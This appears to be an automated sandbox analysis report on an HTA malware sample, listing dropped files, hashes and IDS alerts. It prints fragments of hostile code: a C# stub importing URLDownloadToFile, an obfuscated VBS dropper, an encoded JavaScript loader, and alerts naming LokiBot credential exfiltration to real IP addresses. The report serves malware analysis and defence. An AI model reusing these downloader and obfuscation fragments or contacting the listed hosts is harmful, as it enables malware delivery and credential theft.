SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\RESF0FC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Nov 15 18:26:30 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.970755525291528
Encrypted:	false
SSDEEP:	24:HGe9EuZf8MSuXDfHswKEbsmfII+ycuZhNkPakSFoPNnqSqd:DB8uzTKPmg1ulkPa3FQqSK
MD5:	44E96A7449299846E8E847696C9D1AF6
SHA1:	B8C763C8EEFDFB4C06FAE8FD463FA3284E45EB28
SHA-256:	6ABA106CF10AA54500DA20E9E7E4085C6FB9658B0A0B0B27157C4CB0DED1AE65
SHA-512:	1C32C1418B2608E087286EC57F253C8CE2D6FEF853AB191E334E03FE4E55E1C22E44234EB5AA9211B8479EE840E624ABA5DE3979A16D71A861C910C42412BE8E
Malicious:	false
Preview:	L...V.7g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP.............................`.R..........4.......C:\Users\user\AppData\Local\Temp\RESF0FC.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.n.f.t.n.g.t.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t23us1s.dbv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dzvmsfy.4nk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4psscq2w.sz3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b34mov4b.25m.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2rinent.q0v.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbbjqvnr.fw2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lc2yyf2x.g5c.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ramf22bj.2ny.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5xc2qps.3em.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z43vy0ct.e3h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0754869325454095
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryOPak7YnqqFoPN5Dlq5J:+RI+ycuZhNkPakSFoPNnqX
MD5:	DDFA058AF8A4168312F61FF8BB60E052
SHA1:	731AA83C6BF1F8975E8E0730684E7C42153512D7
SHA-256:	4D4531C5526B0DE6019BCD6FCFA8E70A8911485271A08F0E3DB38BE2490EF547
SHA-512:	5B972441364F05D75C7A381086D3DE31EC48354662E9E0E62713EB6106091563E25D38A5455F3B9AAB27DBBCF62BEDF84F2936FBB2A14FC962A6BA1B4B8ED83E
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.n.f.t.n.g.t.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.n.f.t.n.g.t.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
Category:	dropped
Size (bytes):	484
Entropy (8bit):	3.851396934991774
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuFlsUWmMgQXReKJ8SRHy4HUdKWQmCYKLmuD/hINQjy:V/DTLDfuDWLXfHmKW3KLZDSN6y
MD5:	8FC8053789EDE73B926DA0B3D6B6AB73
SHA1:	FEB5351771DC5474C1E18579123E3A5320B12120
SHA-256:	DA39F89715A7D00579CDDD1C02AB586ED7B0C24618CB54555CD37A50D92DC9AB
SHA-512:	271CE0712B57E18229515700CC941D34534CE5B0F6209C086B3F71E93A32AE70882C537AC416B96D08B8C4CC25064C6870336A30B3512C1A932A4445B2468644
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace PBosISR.{. public class OrcYDvQ. {. [DllImport("URLMON.DLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZTkZnLZTgTB,string Fk,string lDC,uint HapOYvihc,IntPtr NjRcdCjW);.. }..}.

C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.185386335202168
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f1nt0zxs7+AEszIwkn23f1n/H:p37Lvkmb6KRfP0WZEif5
MD5:	1A44C15D7A0F45649B283A9C5325F968
SHA1:	D81E485B350EAC6E935BAF2E85C83BB5932C86AF
SHA-256:	399714DB4D3A0C2E01E3CC8C7196E3A35C7A7223555696E3CF79176240C7E50F
SHA-512:	CF1EF24A8AA5018C46A2D5FBDD8586071582BAE4AD6D2C63A0964E07977E4C20ED9F3AED21C0E1D1E8CE2B421CD25B3B8B1143A3D5904414C641FAC914015EF3
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.0.cs"

C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.838923966250377
Encrypted:	false
SSDEEP:	24:etGSwPBG5eAdF8mUBkN1qhNS2+9tkZfXAQBCMEWI+ycuZhNkPakSFoPNnq:6PsAdemR6S2/JXAZMn1ulkPa3FQq
MD5:	58FE5DFE02F8E1CF1CE5090131318085
SHA1:	3480534E9DA32C624E3606B5B1C07CB16FE39E6D
SHA-256:	DED4CCE19C8EBAD42F5B4FAA50914D5E75F54BDE76D0605423DF71B0785EA3D8
SHA-512:	CF65DFDF39885A0D4D9493C47D59E8E87A9D753990F8B14EA027420A11EF8C4F68298578DC252F685CDE4D170F902E9D23D7E3E3F2AFC48E9FAB39F3CB0A6984
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.7g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....\|.....\|.......................................... >.....P ......P.........V.....b.....e.....i.....s...P.....P...!.P.....P.......!............>.......................................'..........<Module>.dn

C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
Category:	modified
Size (bytes):	867
Entropy (8bit):	5.2860256635826826
Encrypted:	false
SSDEEP:	24:KJBqd3ka6KRfNEif8Kax5DqBVKVrdFAMBJTH:Cika6CNEu8K2DcVKdBJj
MD5:	EC4E61FF3FB9FB55B71A3A86C99C4165
SHA1:	FAAE4E14A1A4DED69692C7FB6916398C27E5F618
SHA-256:	2D962113E6D53A550281083D406D44A6D6773E599F69F026A0D97BADE22B0D93
SHA-512:	6D8C08816AA59B15024C88071A2D4B1BC9B41B8D9DB268B3EE6ADE543FAC77BFE01B46C9C538E2B3511E0D37B67A71A07C5CD9EB2C7C7ADA04F57C61772F5F70
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\188E93\31437F.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	56368
Entropy (8bit):	6.120994357619221
Encrypted:	false
SSDEEP:	768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
MD5:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
SHA1:	19DFD86294C4A525BA21C6AF77681B2A9BBECB55
SHA-256:	99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
SHA-512:	94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: invoice727282_PDF..exe, Detection: malicious, Browse Filename: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs, Detection: malicious, Browse Filename: 6038732).vbs, Detection: malicious, Browse Filename: cirby0J3LP.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse Filename: 3vj5tYFb6a.exe, Detection: malicious, Browse Filename: 50000PCSPIC12F1501-ESN.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exe, Detection: malicious, Browse Filename: Jdxvyx.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(......(....-...~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
Category:	dropped
Size (bytes):	143380
Entropy (8bit):	3.6712104367027116
Encrypted:	false
SSDEEP:	3072:WKjHhIZg8X9/CZUN6RRj09RrXaTGZ8tE6cORoG73St8gt5peRyMyr0+EnGGwm:fN8X9/CGIRR2Ro
MD5:	7450B95AC8FA59E12E46A4C2A6CF36ED
SHA1:	F1E5EC3ACDD59283CCAF7611F572CCBBD4009B63
SHA-256:	12A0A30BF86B8A8EB35E4309A523FAF7673C467DC623F3CFB09FCD45FC4FC139
SHA-512:	951B71EDDD8C390E9BB37585F8865E7E7343A967A62321EDD74B06D9474DF3F0C8C5440A91E96D672D5369B181828C655F28D233F5E3A5FB6945C48EF808B754
Malicious:	true
Preview:	..........F.u.n.c.t.i.o.n. .s.o.n.a.n.t.e.(.B.y.V.a.l. .p.i.o.c.a.m.e.c.r.a.n.s.,. .B.y.V.a.l. .x.a.n.t.e.l.o.m.a.,. .B.y.V.a.l. .r.e.c.a.t.a.d.a.m.e.n.t.e.)..... . . . .D.i.m. .p.i.r.o.s.e..... . . . .p.i.r.o.s.e. .=. .I.n.S.t.r.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .x.a.n.t.e.l.o.m.a.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .p.i.r.o.s.e. .>. .0..... . . . . . . . .p.i.o.c.a.m.e.c.r.a.n.s. .=. .L.e.f.t.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .p.i.r.o.s.e. .-. .1.). .&. .r.e.c.a.t.a.d.a.m.e.n.t.e. .&. .M.i.d.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .p.i.r.o.s.e. .+. .L.e.n.(.x.a.n.t.e.l.o.m.a.).)..... . . . . . . . .p.i.r.o.s.e. .=. .I.n.S.t.r.(.p.i.r.o.s.e. .+. .L.e.n.(.r.e.c.a.t.a.d.a.m.e.n.t.e.).,. .p.i.o.c.a.m.e.c.r.a.n.s.,. .x.a.n.t.e.l.o.m.a.)..... . . . .L.o.o.p..... . . . ..... . . . .s.o.n.a.n.t.e. .=. .p.i.o.c.a.m.e.c.r.a.n.s.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . .

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	2.346528603865231
TrID:
File name:	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta
File size:	182'548 bytes
MD5:	5476ba599869d81abee08f38f1c1a1d9
SHA1:	46748779ec123145fdf90942c9df65d0099c9a99
SHA256:	ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669
SHA512:	516531534bee5995295659464f480c6d12909668fdb623c0c02dd93c9055df7bb203833e4e84416b31ef923dff8057f76f0e850bb84c53096cac43cdf2d04edd
SSDEEP:	96:4vCl172Xu01IhxXYcQu01IhPXYZxd7b2+sMdHeu01IhLu01Ih5XY4u01Iht5Q:4vCldarG1QrGsx92+KrGLrGZrGLQ
TLSH:	97048E95DA3498C8BBCD4CA77EFC778D79B8935F56DA2D81831B3000EC2939CA48051E
File Content Preview:	<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%25252

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-15T18:14:04.339237+0100	2858295	ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)	1	192.3.243.136	80	192.168.2.4	49738	TCP
2024-11-15T18:14:06.302119+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.4	49730	192.3.243.136	80	TCP
2024-11-15T18:14:28.588137+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49739	94.156.177.95	80	TCP
2024-11-15T18:14:28.588137+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49739	94.156.177.95	80	TCP
2024-11-15T18:14:28.588137+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49739	94.156.177.95	80	TCP
2024-11-15T18:14:29.539079+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49739	94.156.177.95	80	TCP
2024-11-15T18:14:29.696597+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49740	94.156.177.95	80	TCP
2024-11-15T18:14:29.696597+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49740	94.156.177.95	80	TCP
2024-11-15T18:14:29.696597+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49740	94.156.177.95	80	TCP
